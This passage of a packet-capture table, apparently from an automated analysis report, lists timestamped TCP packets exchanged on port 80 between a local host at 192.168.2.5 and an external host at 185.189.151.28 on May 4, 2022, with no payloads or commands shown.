| May 4, 2022 16:28:12.773184061 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773192883 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773211002 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773224115 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773230076 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773247957 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773257017 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773264885 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773267031 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773282051 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773286104 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773298979 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773312092 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773329973 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773365974 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773652077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773727894 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.795243979 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.795430899 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.829577923 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.852370977 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126252890 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126326084 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126365900 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126367092 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126405954 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126422882 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126430035 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126447916 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126449108 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126487017 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126504898 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126518011 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126547098 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126560926 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126679897 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126722097 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126739025 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126764059 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126777887 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.126791000 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.126815081 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.140165091 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140196085 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140213966 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140227079 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140274048 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.140311956 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.140794039 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140815973 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140835047 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140851974 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140860081 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.140867949 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140886068 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140887022 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.140898943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.140943050 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.141726971 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141753912 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141783953 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141792059 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.141796112 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141807079 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141819000 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141822100 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.141830921 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.141865015 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.142137051 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142158031 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142174959 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142188072 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142189980 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.142211914 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.142344952 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142375946 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142391920 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142400026 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.142442942 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.142518997 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.149512053 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.149626017 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154299021 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154328108 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154345989 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154361010 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154377937 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154393911 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154398918 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154406071 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154428005 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154467106 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154566050 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154618025 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154746056 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154764891 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154781103 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154798031 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154805899 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154814005 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154825926 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.154839039 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.154872894 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.155499935 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155523062 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155539036 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155555010 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155567884 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.155570984 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155587912 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155599117 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.155606985 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.155625105 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.157507896 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157543898 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157557011 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157567978 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157578945 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157588959 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.157591105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157603025 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157613993 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157624960 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157635927 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157640934 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.157648087 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157659054 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157670975 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157675028 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.157691002 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.157716990 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158240080 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158257961 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158276081 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158287048 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158301115 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158355951 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158705950 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158768892 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158808947 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158826113 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158843994 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158850908 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158859015 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158874989 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158884048 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.158886909 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.158920050 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.159132957 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.159149885 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.159166098 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.159177065 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.159189939 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.159224033 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168447018 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168508053 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168529987 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168546915 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168596029 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168613911 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168618917 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168641090 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168662071 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168673992 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168683052 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168704033 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168709993 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168726921 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168742895 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168747902 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168762922 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.168766022 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.168796062 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.169133902 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169159889 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169179916 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169188023 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.169194937 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169229031 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.169537067 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169560909 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169583082 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169591904 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.169596910 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.169608116 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.169635057 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171122074 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171147108 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171168089 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171189070 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171192884 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171211004 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171217918 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171235085 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171243906 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171252012 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171273947 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171281099 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171294928 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171317101 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171334028 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171338081 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171360016 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171366930 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171380997 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171396017 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.171396017 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171418905 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.171443939 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.172142029 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.172220945 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.172631979 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.172723055 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.172729969 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.172745943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.172761917 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.172777891 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.172804117 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173070908 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173096895 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173116922 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173139095 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173161030 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173182011 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173190117 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173197985 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173218966 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173233986 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173240900 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173263073 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173268080 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173283100 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173295975 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173305035 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173316956 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173326969 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173340082 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173341036 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.173376083 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173542023 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.173990011 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174012899 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174036026 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174057007 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174066067 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.174077988 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174088955 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.174099922 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174113989 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.174122095 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174141884 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174148083 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.174156904 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.174179077 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.174216032 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.175625086 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.175646067 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.175666094 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.175683022 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.175694942 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.175719023 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.175741911 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176719904 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176742077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176757097 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176815033 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176819086 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176841974 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176852942 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176863909 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176872969 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176886082 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176892996 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176908970 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176914930 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176932096 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176939964 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176953077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176954031 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176975012 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.176981926 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.176990986 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177006960 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
